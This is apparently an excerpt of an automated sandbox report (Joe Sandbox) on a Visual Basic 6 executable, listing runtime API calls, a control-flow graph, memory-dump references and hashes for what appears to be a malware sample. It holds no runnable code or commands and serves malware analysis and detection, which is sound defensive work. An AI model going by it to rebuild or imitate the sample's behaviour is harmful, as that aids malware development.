                                                                                                                                                                                  • __vbaGet3.MSVBVM60(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041191E
                                                                                                                                                                                  • __vbaI2I4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041192E
                                                                                                                                                                                  • __vbaPut3.MSVBVM60(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041193B
                                                                                                                                                                                  • #525.MSVBVM60(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411979
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411984
                                                                                                                                                                                  • __vbaI2I4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411994
                                                                                                                                                                                  • __vbaGet3.MSVBVM60(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004119A1
                                                                                                                                                                                  • __vbaI2I4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 004119B1
                                                                                                                                                                                  • __vbaPut3.MSVBVM60(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004119BE
                                                                                                                                                                                  • __vbaI2I4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 004119E0
                                                                                                                                                                                  • __vbaFileClose.MSVBVM60(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004119E7
                                                                                                                                                                                  • #648.MSVBVM60(0000000A,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411A16
                                                                                                                                                                                  • __vbaFreeVar.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411A25
                                                                                                                                                                                  • __vbaI2I4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411A39
                                                                                                                                                                                  • __vbaFileOpen.MSVBVM60(00000220,000000FF,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411A47
                                                                                                                                                                                  • __vbaI2I4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411A57
                                                                                                                                                                                  • __vbaFileClose.MSVBVM60(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411A5E
                                                                                                                                                                                  • #580.MSVBVM60(?,00000026,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411A71
                                                                                                                                                                                  • __vbaI2I4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411A85
                                                                                                                                                                                  • __vbaFileOpen.MSVBVM60(00000220,000000FF,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411A93
                                                                                                                                                                                  • #525.MSVBVM60(00001000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411AA5
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411AB0
                                                                                                                                                                                  • __vbaI2I4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411B09
                                                                                                                                                                                  • __vbaGet3.MSVBVM60(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411B16
                                                                                                                                                                                  • __vbaI2I4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411B26
                                                                                                                                                                                  • __vbaPut3.MSVBVM60(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411B33
                                                                                                                                                                                  • #525.MSVBVM60(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411B71
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411B7C
                                                                                                                                                                                  • __vbaI2I4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411B8C
                                                                                                                                                                                  • __vbaGet3.MSVBVM60(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411B99
                                                                                                                                                                                  • __vbaI2I4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411BA9
                                                                                                                                                                                  • __vbaPut3.MSVBVM60(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411BB6
                                                                                                                                                                                  • #598.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411BD0
                                                                                                                                                                                  • __vbaI2I4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411BE5
                                                                                                                                                                                  • __vbaFileClose.MSVBVM60(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411BEC
                                                                                                                                                                                  • __vbaI2I4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411BFC
                                                                                                                                                                                  • __vbaFileClose.MSVBVM60(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411C03
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00406BF8,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411C19
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411C24
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411C31
                                                                                                                                                                                  • #600.MSVBVM60(00000008,00000001,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411C47
                                                                                                                                                                                  • __vbaFreeStr.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411C56
                                                                                                                                                                                  • __vbaFreeVar.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411C5F
                                                                                                                                                                                  • #600.MSVBVM60(00004008,00000000), ref: 00411C85
                                                                                                                                                                                  • __vbaFreeStr.MSVBVM60(00411CE8), ref: 00411CBD
                                                                                                                                                                                  • __vbaFreeStr.MSVBVM60(?,?,00000000,004025E6), ref: 00411CC6
                                                                                                                                                                                  • __vbaFreeStr.MSVBVM60(?,?,00000000,004025E6), ref: 00411CCF
                                                                                                                                                                                  • __vbaFreeStr.MSVBVM60(?,?,00000000,004025E6), ref: 00411CD8
                                                                                                                                                                                  • __vbaFreeStr.MSVBVM60(?,?,00000000,004025E6), ref: 00411CE1
                                                                                                                                                                                  • __vbaErrorOverflow.MSVBVM60 ref: 00411CFF
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.463478599.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.463467976.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.463474179.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.463709716.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.463726077.000000000041D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_sJ9Q8UWMAX.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: __vba$Free$FileMove$CloseGet3$#525$CopyOpenPut3$#516#631#648BstrErrorSeek$#580#600Chkstk$#529#537#570#598ListOverflow
                                                                                                                                                                                  • String ID: E
                                                                                                                                                                                  • API String ID: 1020712489-3568589458
                                                                                                                                                                                  • Opcode ID: dd04ee743c3aedb4f20eed2c2bd3a439915ce7c229051d87dfabd16d575bf736
                                                                                                                                                                                  • Instruction ID: 2c3bdc2995cc32bb6ddafcd024d806e85dbf0c974109c8e670926915eacf5b68
                                                                                                                                                                                  • Opcode Fuzzy Hash: dd04ee743c3aedb4f20eed2c2bd3a439915ce7c229051d87dfabd16d575bf736
                                                                                                                                                                                  • Instruction Fuzzy Hash: 8322E6B1900249EBDB04DFE0DA48ADEBBB5FF48305F108129E602B76A0DB745A85DB58
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 00408D7C Relevance: 129.9, APIs: 73, Strings: 1, Instructions: 397COMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 386 408d7c-408d87 387 40abac-40ac9b __vbaErrorOverflow __vbaChkstk __vbaOnError call 418c90 * 2 386->387 388 408d8d-408d9c 386->388 391 408da2-409172 __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove call 410180 __vbaFreeStrList __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove call 410180 __vbaFreeStrList __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove call 410180 __vbaFreeStrList __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove call 410180 388->391 392 4091be-4091da __vbaStrCmp 388->392 439 409177-4091b9 __vbaFreeStrList 391->439 395 4091e0-409209 call 4125a0 392->395 396 40948c-4094a8 __vbaStrCmp 392->396 411 40924b-409296 __vbaStrCat #600 __vbaFreeVar 395->411 412 40920b-409245 call 40fba0 call 415660 #580 395->412 399 409b34-409c67 __vbaStrCopy call 40ee70 __vbaStrMove __vbaStrCopy call 40ee70 __vbaStrMove * 3 #690 __vbaFreeStrList #537 __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove call 411590 396->399 400 4094ae-4094c7 call 4125a0 396->400 435 409c6c-409c97 __vbaFreeStrList 399->435 417 409509-409582 __vbaStrCat #600 __vbaFreeVar __vbaNew __vbaObjSet 400->417 418 4094c9-409503 call 40fba0 call 415660 #580 400->418 413 409298-4092a4 call 404c14 __vbaSetSystemError 411->413 414 4092aa-40933d __vbaStrCopy call 40ee70 __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaObjSet 411->414 412->411 413->414 455 409362 414->455 456 40933f-409360 __vbaHresultCheckObj 414->456 436 409584-4095a5 __vbaHresultCheckObj 417->436 437 4095a7 417->437 418->417 441 409c99-409ca6 __vbaEnd 435->441 442 409cab-409cc4 call 4125a0 435->442 443 4095b1-409646 __vbaFreeObj __vbaStrCopy call 410fb0 __vbaStrMove call 40ee70 __vbaStrMove __vbaInStr __vbaFreeStrList 436->443 437->443 446 409dec-409ee3 __vbaStrCopy call 40ee70 __vbaStrMove __vbaStrCopy call 40ee70 __vbaStrMove * 3 #690 __vbaFreeStrList #600 __vbaEnd 441->446 442->446 453 409cca-409ce4 #535 442->453 474 4097e2-409858 __vbaStrCopy call 410fb0 __vbaStrMove call 40ee70 __vbaStrMove __vbaInStr __vbaFreeStrList 443->474 475 40964c-4097dd __vbaStrCopy call 40ee70 __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaStrCopy call 40ee70 __vbaStrMove #611 #661 #705 __vbaStrMove * 3 __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat #600 __vbaFreeStrList __vbaFreeVarList 443->475 467 409ee9-40a26c __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove call 418c90 __vbaFreeStrList __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove call 418c90 __vbaFreeStrList call 418a10 * 2 __vbaStrCopy call 40ee70 __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaStrCopy call 40ee70 __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaStrCopy call 40ee70 __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaStrCopy call 40ee70 __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaStrCopy call 40ee70 __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaStrCopy call 40ee70 __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaStrCopy call 40ee70 __vbaStrMove __vbaStrCopy __vbaFreeStrList 446->467 459 40aba7 453->459 460 409cea-409db1 __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove call 410180 __vbaFreeStrList call 40fba0 #598 call 415660 453->460 457 40936c-4093ff __vbaFreeObj __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove call 410780 __vbaFreeStrList 455->457 456->457 470 409405-409481 __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat #600 __vbaFreeStrList __vbaFreeVar 457->470 471 409487 457->471 459->459 490 409db3 460->490 491 409db5-409dd0 #535 __vbaFpR4 460->491 530 40a272-40a2b9 __vbaStrCat __vbaStrMove call 40f8f0 __vbaFreeStr 467->530 531 40aa5b-40aa71 call 40f1d0 467->531 470->471 471->467 493 409aad-409af7 __vbaObjSet 474->493 494 40985e-40986c 474->494 475->493 496 409dd6-409de6 #580 490->496 491->460 491->496 508 409af9-409b1a __vbaHresultCheckObj 493->508 509 409b1c 493->509 497 40988a 494->497 498 40986e-409888 __vbaNew2 494->498 496->446 501 409894-4098c7 497->501 498->501 510 4098c9-4098ea __vbaHresultCheckObj 501->510 511 4098ec 501->511 513 409b26-409b2f __vbaFreeObj 508->513 509->513 514 4098f6-409924 510->514 511->514 513->467 519 409926-409947 __vbaHresultCheckObj 514->519 520 409949 514->520 521 409953-409aaa #611 #661 #705 __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove * 2 __vbaStrCat __vbaStrMove __vbaStrCat #600 __vbaFreeStrList __vbaFreeObj __vbaFreeVarList 519->521 520->521 521->493 536 40a329-40a370 __vbaStrCat __vbaStrMove call 40f8f0 __vbaFreeStr 530->536 537 40a2bb-40a323 __vbaStrCat __vbaStrMove #580 __vbaFreeStr __vbaStrCat #529 __vbaFreeVar 530->537 538 40aa73-40aa7a call 40f1a0 531->538 539 40aa7f-40aac9 __vbaObjSet 531->539 544 40a3e0-40a427 __vbaStrCat __vbaStrMove call 40f8f0 __vbaFreeStr 536->544 545 40a372-40a3da __vbaStrCat __vbaStrMove #580 __vbaFreeStr __vbaStrCat #529 __vbaFreeVar 536->545 537->536 538->539 548 40aacb-40aaec __vbaHresultCheckObj 539->548 549 40aaee 539->549 552 40a497-40a4de __vbaStrCat __vbaStrMove call 40f8f0 __vbaFreeStr 544->552 553 40a429-40a491 __vbaStrCat __vbaStrMove #580 __vbaFreeStr __vbaStrCat #529 __vbaFreeVar 544->553 545->544 551 40aaf8-40ab84 __vbaFreeObj __vbaFreeStr * 2 548->551 549->551 557 40a4e0-40a548 __vbaStrCat __vbaStrMove #580 __vbaFreeStr __vbaStrCat #529 __vbaFreeVar 552->557 558 40a54e-40a595 __vbaStrCat __vbaStrMove call 40f8f0 __vbaFreeStr 552->558 553->552 557->558 561 40a605-40a64c __vbaStrCat __vbaStrMove call 40f8f0 __vbaFreeStr 558->561 562 40a597-40a5ff __vbaStrCat __vbaStrMove #580 __vbaFreeStr __vbaStrCat #529 __vbaFreeVar 558->562 565 40a6bc-40a703 __vbaStrCat __vbaStrMove call 40f8f0 __vbaFreeStr 561->565 566 40a64e-40a6b6 __vbaStrCat __vbaStrMove #580 __vbaFreeStr __vbaStrCat #529 __vbaFreeVar 561->566 562->561 569 40a773-40a7ba __vbaStrCat __vbaStrMove call 40f8f0 __vbaFreeStr 565->569 570 40a705-40a76d __vbaStrCat __vbaStrMove #580 __vbaFreeStr __vbaStrCat #529 __vbaFreeVar 565->570 566->565 573 40a82a-40a871 __vbaStrCat __vbaStrMove call 40f8f0 __vbaFreeStr 569->573 574 40a7bc-40a824 __vbaStrCat __vbaStrMove #580 __vbaFreeStr __vbaStrCat #529 __vbaFreeVar 569->574 570->569 577 40a8e1-40a928 __vbaStrCat __vbaStrMove call 40f8f0 __vbaFreeStr 573->577 578 40a873-40a8db __vbaStrCat __vbaStrMove #580 __vbaFreeStr __vbaStrCat #529 __vbaFreeVar 573->578 574->573 581 40a998-40a9df __vbaStrCat __vbaStrMove call 40f8f0 __vbaFreeStr 577->581 582 40a92a-40a992 __vbaStrCat __vbaStrMove #580 __vbaFreeStr __vbaStrCat #529 __vbaFreeVar 577->582 578->577 585 40a9e1-40aa49 __vbaStrCat __vbaStrMove #580 __vbaFreeStr __vbaStrCat #529 __vbaFreeVar 581->585 586 40aa4f-40aa56 581->586 582->581 585->586
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000,0040614C), ref: 00408DB5
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 00408DC0
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 00408DCE
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 00408DD9
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(0040614C,00000000), ref: 00408DE5
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 00408DF0
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 00408DFD
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 00408E08
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 00408E16
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 00408E21
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(0040614C,00000000), ref: 00408E2D
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 00408E38
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 00408E46
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 00408E51
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 00408E5E
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 00408E69
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(0040614C,00000000), ref: 00408E75
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 00408E80
                                                                                                                                                                                    • Part of subcall function 00410180: __vbaChkstk.MSVBVM60(00000000,004025E6,?,?,?,?,00409D5A,00000000), ref: 0041019E
                                                                                                                                                                                    • Part of subcall function 00410180: __vbaStrCopy.MSVBVM60(?,?,?,00000000,004025E6), ref: 004101CE
                                                                                                                                                                                    • Part of subcall function 00410180: __vbaAryConstruct2.MSVBVM60(?,004068A0,00000003,?,?,?,00000000,004025E6), ref: 004101DF
                                                                                                                                                                                    • Part of subcall function 00410180: __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004025E6), ref: 004101EE
                                                                                                                                                                                    • Part of subcall function 00410180: __vbaSetSystemError.MSVBVM60(0000000F,00000000,?,?,?,00000000,004025E6), ref: 0041020A
                                                                                                                                                                                    • Part of subcall function 00410180: __vbaRecUniToAnsi.MSVBVM60(00404B50,?,00000128), ref: 00410244
                                                                                                                                                                                    • Part of subcall function 00410180: __vbaSetSystemError.MSVBVM60(?,00000000), ref: 0041025A
                                                                                                                                                                                    • Part of subcall function 00410180: __vbaRecAnsiToUni.MSVBVM60(00404B50,00000128,?), ref: 00410273
                                                                                                                                                                                    • Part of subcall function 00410180: #525.MSVBVM60(00000104), ref: 0041029C
                                                                                                                                                                                    • Part of subcall function 00410180: __vbaStrMove.MSVBVM60 ref: 004102A7
                                                                                                                                                                                    • Part of subcall function 00410180: __vbaSetSystemError.MSVBVM60(00000410,00000000,?), ref: 004102DE
                                                                                                                                                                                    • Part of subcall function 00410180: __vbaStrToAnsi.MSVBVM60(?,?,000001F4), ref: 00410338
                                                                                                                                                                                  • __vbaFreeStrList.MSVBVM60(00000009,?,?,?,?,?,?,?,?,?,00000000), ref: 00408EB2
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000,0040614C), ref: 00408ECE
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 00408ED9
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 00408EE7
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 00408EF2
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(0040614C,00000000), ref: 00408EFE
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 00408F09
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 00408F16
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 00408F21
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 00408F2F
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 00408F3A
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(0040614C,00000000), ref: 00408F46
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 00408F51
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 00408F5F
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 00408F6A
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 00408F77
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 00408F82
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(0040614C,00000000), ref: 00408F8E
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 00408F99
                                                                                                                                                                                    • Part of subcall function 00410180: __vbaGenerateBoundsError.MSVBVM60 ref: 0041031D
                                                                                                                                                                                    • Part of subcall function 00410180: __vbaSetSystemError.MSVBVM60(?,?,00000000), ref: 0041035E
                                                                                                                                                                                    • Part of subcall function 00410180: __vbaStrToUnicode.MSVBVM60(?,?,?,00000000), ref: 0041036F
                                                                                                                                                                                    • Part of subcall function 00410180: __vbaFreeStr.MSVBVM60(?,00000000), ref: 00410384
                                                                                                                                                                                    • Part of subcall function 00410180: #616.MSVBVM60(?,?,?,00000000), ref: 00410399
                                                                                                                                                                                    • Part of subcall function 00410180: __vbaStrMove.MSVBVM60(?,00000000), ref: 004103A7
                                                                                                                                                                                    • Part of subcall function 00410180: __vbaStrMove.MSVBVM60(?,?,00000000), ref: 004103BE
                                                                                                                                                                                    • Part of subcall function 00410180: __vbaFreeStr.MSVBVM60(?,00000000), ref: 004103CA
                                                                                                                                                                                    • Part of subcall function 00410180: __vbaLenBstr.MSVBVM60(?,?,00000000), ref: 004103DB
                                                                                                                                                                                    • Part of subcall function 00410180: __vbaStrCat.MSVBVM60(?,0040614C,?,00000001,?,00000000), ref: 00410402
                                                                                                                                                                                    • Part of subcall function 00410180: __vbaStrMove.MSVBVM60(?,00000000), ref: 00410410
                                                                                                                                                                                    • Part of subcall function 00410180: __vbaStrCat.MSVBVM60(0040614C,00000000,?,00000000), ref: 0041041C
                                                                                                                                                                                    • Part of subcall function 00410180: __vbaStrMove.MSVBVM60(?,00000000), ref: 0041042A
                                                                                                                                                                                    • Part of subcall function 00410180: __vbaInStr.MSVBVM60(00000001,00000000,?,00000000), ref: 00410433
                                                                                                                                                                                    • Part of subcall function 00410180: __vbaFreeStrList.MSVBVM60(00000002,?,?,?,00000000), ref: 00410459
                                                                                                                                                                                    • Part of subcall function 00410180: __vbaRecUniToAnsi.MSVBVM60(00404B50,?,00000128,?,00000000), ref: 0041049A
                                                                                                                                                                                    • Part of subcall function 00410180: __vbaSetSystemError.MSVBVM60(?,00000000,?,00000000), ref: 004104B0
                                                                                                                                                                                    • Part of subcall function 00410180: __vbaRecAnsiToUni.MSVBVM60(00404B50,00000128,?,?,00000000), ref: 004104C9
                                                                                                                                                                                  • __vbaFreeStrList.MSVBVM60(00000009,?,?,?,?,?,?,?,?,?,00000000), ref: 00408FCB
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000,0040614C), ref: 00408FE7
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 00408FF2
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 00409000
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 0040900B
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(0040614C,00000000), ref: 00409017
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 00409022
                                                                                                                                                                                    • Part of subcall function 00410180: FindCloseChangeNotification.KERNELBASE(?), ref: 004104ED
                                                                                                                                                                                    • Part of subcall function 00410180: __vbaFreeStr.MSVBVM60(0041054B), ref: 00410517
                                                                                                                                                                                    • Part of subcall function 00410180: __vbaAryDestruct.MSVBVM60(00000000,?), ref: 0041052F
                                                                                                                                                                                    • Part of subcall function 00410180: __vbaFreeStr.MSVBVM60 ref: 00410538
                                                                                                                                                                                    • Part of subcall function 00410180: __vbaFreeStr.MSVBVM60 ref: 00410544
                                                                                                                                                                                  • __vbaFreeStrList.MSVBVM60(00000003,?,?,?,00000000), ref: 0040903C
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000,0040614C), ref: 00409057
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 00409062
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 00409070
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 0040907B
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(0040614C,00000000), ref: 00409087
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 00409092
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 004090A0
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 004090AB
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 004090B8
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 004090C3
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(0040614C,00000000), ref: 004090CF
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 004090DA
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 004090E8
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 004090F3
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 00409101
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 0040910C
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(0040614C,00000000), ref: 00409118
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 00409123
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 00409130
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 0040913B
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 00409149
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 00409154
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(0040614C,00000000), ref: 00409160
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 0040916B
                                                                                                                                                                                  • __vbaFreeStrList.MSVBVM60(0000000C,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004091A9
                                                                                                                                                                                  • __vbaStrCmp.MSVBVM60(00000000,00000000), ref: 004091D2
                                                                                                                                                                                  • #580.MSVBVM60(00000000,00000027,00000000,00000000,0041B088,00000000), ref: 00409245
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60( SE,00000000,00000000), ref: 0040925D
                                                                                                                                                                                  • #600.MSVBVM60(00000008,00000000), ref: 00409273
                                                                                                                                                                                  • __vbaFreeVar.MSVBVM60 ref: 00409282
                                                                                                                                                                                  • __vbaSetSystemError.MSVBVM60 ref: 004092A4
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60 ref: 004092B9
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?), ref: 004092CD
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60 ref: 004092DA
                                                                                                                                                                                  • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 004092EA
                                                                                                                                                                                  • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040930E
                                                                                                                                                                                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,00405A00,0000005C), ref: 00409354
                                                                                                                                                                                  • __vbaErrorOverflow.MSVBVM60 ref: 0040ABAC
                                                                                                                                                                                  • __vbaChkstk.MSVBVM60(?,004025E6), ref: 0040ABDE
                                                                                                                                                                                  • __vbaOnError.MSVBVM60(000000FF,?,?,?,?,004025E6), ref: 0040AC25
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.463478599.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.463467976.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.463474179.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
